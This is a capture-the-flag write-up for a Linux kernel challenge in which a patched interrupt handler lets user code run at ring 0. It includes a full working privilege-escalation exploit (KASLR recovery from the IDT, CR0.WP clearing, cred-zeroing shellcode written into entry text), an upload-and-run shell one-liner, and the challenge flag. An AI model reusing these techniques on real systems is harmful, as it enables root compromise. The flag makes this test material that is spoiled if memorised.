Promotion - PWN
Points: 477 | Solves: 24 | Flag: BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...} | Solved by: Smothy @ 0xN1umb

what we got
Kernel pwn challenge. Files:
bzImage - compressed Linux kernel (6.17.0-dirty); rootfs.cpio.gz - minimal rootfs (busybox, drops to uid 1000); run.sh - QEMU launcher with kaslr pti=on, -cpu kvm64, flag at -hda /challenge/flag.txt; diff.txt - the juicy kernel patch
understanding the vuln
The patch adds a custom interrupt handler at vector 0x81, registered as SYSG (System Gate = user-callable from ring 3):
SYM_CODE_START(asm_exc_promotion)
pushq %rax
movq %cs, %rax ; grab kernel CS (0x10)
movq %rax, 16(%rsp) ; overwrite CS in iretq frame
xorq %rax, %rax
movq %rax, 40(%rsp) ; zero SS in iretq frame
popq %rax
iretq
SYM_CODE_END(asm_exc_promotion)

ngl this is clean af. when you int $0x81 from userland, the CPU pushes the usual interrupt frame (SS, RSP, RFLAGS, CS, RIP) onto the kernel stack. the handler then overwrites CS with kernel CS and zeros SS. so when iretq fires, you land back at your next user instruction but now running at CPL 0 (ring 0). literally a "promotion" lmao.
QEMU uses -cpu kvm64 which means no SMEP, no SMAP. we can access user memory from ring 0 freely. but PTI (KPTI) is on, which matters later.
the solve
step 1: getting to ring 0
easy part. just int $0x81 and we're supervisor. but there's housekeeping:
- cli - disable interrupts so nothing disturbs us
- swapgs - switch GS to kernel GS base (needed for percpu access later)
- switch RSP to our own mmap'd stack (the user stack might be too shallow for ring 0 push operations)
step 2: KASLR bypass
kptr_restrict=1 and dmesg_restrict=1 so no leaking from userspace. but from ring 0 we can use sidt to read the IDT base (in the CPU entry area), then parse the IDT gate descriptor for vector 0x81 to recover the actual address of asm_exc_promotion. comparing against the static address gives us the KASLR slide.
sidt (%rsp) ; store IDT base
movq 2(%rsp), %rax ; IDT base addr
addq $0x810, %rax ; IDT entry for vector 0x81 (16 bytes each)
; reconstruct 64-bit handler address from gate descriptor fields
movzwl (%rax), %ebx ; offset[15:0]
movzwl 6(%rax), %ecx ; offset[31:16]
shll $16, %ecx
orl %ecx, %ebx
movl 8(%rax), %ecx ; offset[63:32]
shlq $32, %rcx
orq %rcx, %rbx ; rbx = asm_exc_promotion + KASLR

step 3: the NX wall (the hard part)
first attempt was to just switch CR3 to kernel page tables and do everything inline. nope. with KPTI, the kernel page tables set the NX bit on all user PGD entries. so the moment you switch CR3 to kernel page tables, your own code becomes non-executable. instant fault.
the key insight: the .entry.text section is mapped and executable in BOTH user and kernel page tables (it has to be, for interrupt entry/exit). and asm_exc_promotion lives in this section. so we can:
- clear CR0.WP (write protect)
- copy our shellcode over asm_exc_promotion in entry text
- jump there - it executes fine from both page table sets
step 4: the credential shellcode
the shellcode (40 bytes) copied to entry text does:
mov %r15, %cr3 ; switch to kernel page tables
mov %gs:(%rdx), %rax ; read current_task from percpu
mov 0x768(%rax), %rax ; current->cred (offset found via objdump)
xor %rcx, %rcx
mov %rcx, 0x8(%rax) ; uid = gid = 0
mov %rcx, 0x10(%rax) ; suid = sgid = 0
mov %rcx, 0x18(%rax) ; euid = egid = 0
mov %rcx, 0x20(%rax) ; fsuid = fsgid = 0
mov %r14, %cr3 ; switch back to user page tables
jmp *%rbx ; return

the offsets were extracted from the vmlinux (recovered symbols via vmlinux-to-elf):
current_task percpu variable at 0xffffffff83729018 (found by disassembling sys_getuid); cred at task_struct + 0x768; uid at cred + 0x8, euid at cred + 0x18, etc.
step 5: clean return to userland
after the shellcode returns, restore CR0, swapgs back, build an iretq frame and return to ring 3:
swapgs
pushq user_ss
pushq (saved_rsp - 8) ; alignment fix!!
pushq user_rflags
pushq user_cs
pushq ret_rip ; -> get_root_shell()
iretq

critical bug i hit: the -8 on saved_rsp. x86-64 ABI expects RSP = 16n+8 at function entry (as if a call had pushed a return address). without this fix, SSE instructions inside libc (movaps etc) would SIGSEGV on the misaligned stack. lost like an hour to this lol.
step 6: read the flag
back in userland as uid=0(root), just open("/dev/sda") and read the flag. the challenge mounts the flag file as a raw disk via -hda.
making it uploadable
the final exploit is compiled with -nostdlib -static using raw syscalls only - 9KB binary, gzips+base64 to ~800 bytes. uploads to the remote shell in a single echo command:
echo '<base64>' | base64 -d | gzip -d > /tmp/e && chmod +x /tmp/e && /tmp/e

full exploit
// Minimal exploit using raw syscalls - no libc needed
// Compile: gcc -static -nostdlib -no-pie -Os -o exploit exploit_tiny.c && strip exploit
#include <stdint.h>
/* Linux x86-64 syscall numbers (arch/x86/entry/syscalls/syscall_64.tbl). */
#define SYS_READ 0
#define SYS_WRITE 1
#define SYS_OPEN 2
#define SYS_CLOSE 3
#define SYS_MMAP 9
#define SYS_EXIT 60
/* mmap prot/flags (uapi asm-generic mman values). */
#define PROT_READ 1
#define PROT_WRITE 2
#define MAP_PRIVATE 0x02
#define MAP_ANONYMOUS 0x20
#define MAP_POPULATE 0x08000 /* pre-fault the pages - needed for the ring-0 stack */
#define O_RDONLY 0
/* One-argument raw syscall: number in RAX, arg in RDI.
 * SYSCALL clobbers RCX (saved RIP) and R11 (saved RFLAGS), hence the list. */
static long syscall1(long nr, long a1) {
    long rax;
    asm volatile("syscall"
                 : "=a"(rax)
                 : "a"(nr), "D"(a1)
                 : "rcx", "r11", "memory");
    return rax;
}
/* Two-argument raw syscall (args in RDI, RSI). */
static long syscall2(long nr, long a1, long a2) {
    long rax;
    asm volatile("syscall"
                 : "=a"(rax)
                 : "a"(nr), "D"(a1), "S"(a2)
                 : "rcx", "r11", "memory");
    return rax;
}
/* Three-argument raw syscall (args in RDI, RSI, RDX). */
static long syscall3(long nr, long a1, long a2, long a3) {
    long rax;
    asm volatile("syscall"
                 : "=a"(rax)
                 : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                 : "rcx", "r11", "memory");
    return rax;
}
/* Six-argument raw syscall. The kernel ABI takes args 4-6 in R10/R8/R9
 * (R10 instead of the C ABI's RCX because SYSCALL itself overwrites RCX);
 * explicit register variables pin them in place. */
static long syscall6(long nr, long a1, long a2, long a3, long a4, long a5, long a6) {
long ret;
register long r10 asm("r10") = a4;
register long r8 asm("r8") = a5;
register long r9 asm("r9") = a6;
asm volatile("syscall" : "=a"(ret) : "a"(nr), "D"(a1), "S"(a2), "d"(a3),
"r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
/* Thin write(2) wrapper; the return value is deliberately ignored. */
static void my_write(int fd, const char *s, int len) { syscall3(SYS_WRITE, fd, (long)s, len); }
/* Write a NUL-terminated string to stdout (hand-rolled strlen - no libc). */
static void my_puts(const char *s) {
    int len = 0;
    while (s[len])
        len++;
    my_write(1, s, len);
}
/* State shared between the ring-3 setup code, the ring-0 asm, and the
 * final iretq frame back to userland. */
unsigned long user_cs, user_ss, user_rflags, saved_rsp, ret_rip, r0_stk;
// Shellcode: switch CR3->kernel, zero creds, switch CR3->user, return
/* Register contract (set up by the asm in _start before "jmp *%r12"):
 *   r15 = kernel CR3, r14 = user CR3, rdx = current_task percpu slot
 *   (read via GS), rbx = address to jump back to.
 * Offsets: cred at task_struct+0x768, id fields at cred+0x8..0x20
 * (recovered from this kernel's vmlinux - see writeup above). */
unsigned char shellcode[] = {
0x41, 0x0f, 0x22, 0xdf, // mov %r15, %cr3
0x65, 0x48, 0x8b, 0x02, // mov %gs:(%rdx), %rax (current_task)
0x48, 0x8b, 0x80, 0x68, 0x07, 0x00, 0x00, // mov 0x768(%rax), %rax (->cred)
0x48, 0x31, 0xc9, // xor %rcx, %rcx
0x48, 0x89, 0x48, 0x08, // zero uid+gid
0x48, 0x89, 0x48, 0x10, // zero suid+sgid
0x48, 0x89, 0x48, 0x18, // zero euid+egid
0x48, 0x89, 0x48, 0x20, // zero fsuid+fsgid
0x41, 0x0f, 0x22, 0xde, // mov %r14, %cr3
0xff, 0xe3 // jmp *%rbx
};
/* Landing point of the final iretq: back in ring 3 with zeroed creds.
 * Dump the first line of the raw disk (the flag was attached via -hda),
 * then exit. */
void get_root_shell() {
    my_puts("[+] Root!\n");
    char sector[512];
    int fd = syscall2(SYS_OPEN, (long)"/dev/sda", O_RDONLY);
    if (fd >= 0) {
        long got = syscall3(SYS_READ, fd, (long)sector, 512);
        if (got > 0) {
            /* print up to (and including) the first newline, stop at NUL */
            int len = 0;
            while (len < got && sector[len] && sector[len] != '\n')
                len++;
            if (len < got && sector[len] == '\n')
                len++;
            my_write(1, sector, len);
        }
        syscall1(SYS_CLOSE, fd);
    }
    my_puts("\n");
    syscall1(SYS_EXIT, 0);
}
/* Entry point. Promote to ring 0 via int $0x81, recover the KASLR slide
 * from the IDT gate for vector 0x81, copy the cred-zeroing shellcode into
 * .entry.text (executable under both KPTI page-table sets), run it, then
 * iretq back into get_root_shell() at ring 3 as root. */
void _start() {
/* Capture ring-3 CS/SS/RFLAGS now - reused to build the return iretq frame. */
asm volatile("mov %%cs,%0\nmov %%ss,%1\npushfq\npopq %2"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags));
/* Pre-faulted (MAP_POPULATE) scratch stack for ring 0: a push into an
 * unmapped page at CPL 0 here would fault with nowhere to recover. */
long stk = syscall6(SYS_MMAP, 0, 0x40000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
r0_stk = stk + 0x40000 - 0x100;
ret_rip = (unsigned long)get_root_shell;
my_puts("[*] Exploiting...\n");
asm volatile("mov %%rsp, %0" : "=m"(saved_rsp));
asm volatile(
// promote to ring 0 (the 0x81 handler rewrites CS/SS in the iretq frame),
// then mask interrupts and switch to kernel GS base + our own stack
"int $0x81\n" "cli\n" "swapgs\n"
"movq r0_stk(%%rip), %%rsp\n"
// KASLR from IDT entry 0x81: sidt stores limit(2)+base(8), so the base
// is at offset 2; the gate descriptor holds the split handler address
"sub $16,%%rsp\n" "sidt (%%rsp)\n" "movq 2(%%rsp),%%rax\n" "add $16,%%rsp\n"
"addq $0x810,%%rax\n" // vector 0x81 * 16 bytes per gate
"movzwl (%%rax),%%ebx\n" "movzwl 6(%%rax),%%ecx\n" // offset[15:0], offset[31:16]
"shll $16,%%ecx\n" "orl %%ecx,%%ebx\n"
"movl 8(%%rax),%%ecx\n" "shlq $32,%%rcx\n" "orq %%rcx,%%rbx\n" // offset[63:32]
"movq %%rbx,%%r12\n" // r12 = shellcode dest (entry text)
"movabs $0xffffffff81001d30,%%rax\n" "subq %%rax,%%rbx\n" // KASLR offset = runtime - static handler addr
"movabs $0xffffffff83729018,%%rdx\n" "addq %%rbx,%%rdx\n" // current_task percpu
// CR3 setup (user vs kernel page tables): the two KPTI CR3 values differ
// in bits 12/11; clearing both yields the kernel page tables
"mov %%cr3,%%r14\n" "movq %%r14,%%r15\n"
"btrq $12,%%r15\n" "btrq $11,%%r15\n" // r15 = kernel CR3
// clear CR0.WP (bit 16) so ring 0 may write the read-only entry text;
// r9 keeps the original CR0 for restoration
"mov %%cr0,%%rax\n" "movq %%rax,%%r9\n" "btrq $16,%%rax\n" "mov %%rax,%%cr0\n"
"leaq shellcode(%%rip),%%rsi\n" "movq %%r12,%%rdi\n"
// copy the 40-byte shellcode over asm_exc_promotion, 8 bytes at a time
"movq (%%rsi),%%rax\n" "movq %%rax,(%%rdi)\n"
"movq 8(%%rsi),%%rax\n" "movq %%rax,8(%%rdi)\n"
"movq 16(%%rsi),%%rax\n" "movq %%rax,16(%%rdi)\n"
"movq 24(%%rsi),%%rax\n" "movq %%rax,24(%%rdi)\n"
"movq 32(%%rsi),%%rax\n" "movq %%rax,32(%%rdi)\n"
// jump to shellcode in entry text; rbx = label 1 so it can jmp back here
"leaq 1f(%%rip),%%rbx\n" "jmp *%%r12\n"
// back from shellcode - restore and return to userland
"1:\n"
"movq %%r9,%%rax\n" "mov %%rax,%%cr0\n" // restore WP
"swapgs\n" // back to the user GS base before dropping to ring 3
// build the iretq frame: SS, RSP (the -8 keeps RSP = 16n+8 at function
// entry, as if a call had pushed a return address), RFLAGS, CS, RIP
"movq user_ss(%%rip),%%rax\n" "pushq %%rax\n"
"movq saved_rsp(%%rip),%%rax\n" "subq $8,%%rax\n" "pushq %%rax\n"
"movq user_rflags(%%rip),%%rax\n" "pushq %%rax\n"
"movq user_cs(%%rip),%%rax\n" "pushq %%rax\n"
"movq ret_rip(%%rip),%%rax\n" "pushq %%rax\n"
"iretq\n"
::: "rax","rbx","rcx","rdx","rsi","rdi","r8","r9","r12","r14","r15","memory","cc"
);
}

gotchas & failed attempts
- SIDT from userland gives wrong address - SIDT returns the CPU entry area IDT address, not idt_table. moved KASLR computation to ring 0 where we can read the gate descriptors directly.
- double fault on push - pushing the iretq frame below the user stack mapping caused a page fault in ring 0 with no kernel stack. fixed by using a pre-mapped mmap'd stack.
-
double fault on SWAPGS miss - without swapgs, any exception handler tried to access percpu data via the wrong GS base. cascade of faults -> double fault.
- NX on user pages from kernel page tables - KPTI sets NX on user PGD entries in the kernel page tables. can't execute user code after switching CR3. solved by copying shellcode to .entry.text (the one region mapped+executable in both page tables).
- stack alignment SIGSEGV - iretq to a function needs RSP = 16n+8 (like after a call). without the -8 adjustment, movaps in libc internals crashed. dumbest hour of my life.
modprobe_path didn't work - first tried the classic modprobe_path overwrite. the write succeeded but the helper never executed. switched to direct cred zeroing which is more reliable anyway.
flag
BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...}
promotions ARE great. if i only had a job fr fr
smothy out ✌️